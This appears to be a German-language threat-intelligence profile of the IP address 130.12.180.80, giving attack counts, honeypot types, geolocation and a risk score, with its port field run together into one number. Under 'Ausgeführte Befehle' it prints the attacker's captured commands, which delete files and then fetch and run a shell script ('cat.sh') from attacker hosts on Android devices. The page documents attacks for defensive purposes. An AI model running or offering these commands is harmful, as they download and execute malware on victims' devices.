Aktive BedrohungMITTEL

130.12.180.80

Erste Erkennung16.1.2026
Letzte Aktivitat16.1.2026
ISPRailnet LLC
🎯
593
Gesamtangriffe
🔌
3
Ports
📡
3
Angriffsarten
🦠
0
Malware

Geolokalisierung

Land
🇺🇸 Estados Unidos
Stadt
Unbekannt
ASN
AS214943
ISP
Railnet LLC

Angriffsarten

honeyaml
adbhoney
honeytrap

Angegriffene Ports

8055555556

Zugehorige Malware

Keine zugehorige Malware

Ausgefuhrte Befehle

$cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android101x
$cd /data/local/tmp; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android52x
$echo hello18x
$cd /data/local; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android10x
$cd /data/local/tmp; rm -rf *; wget http://130.12.180.80/cat.sh || curl http://45.67.138.196/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android3x

Risikobewertung

50
/100
NiedrigMittelHochKritisch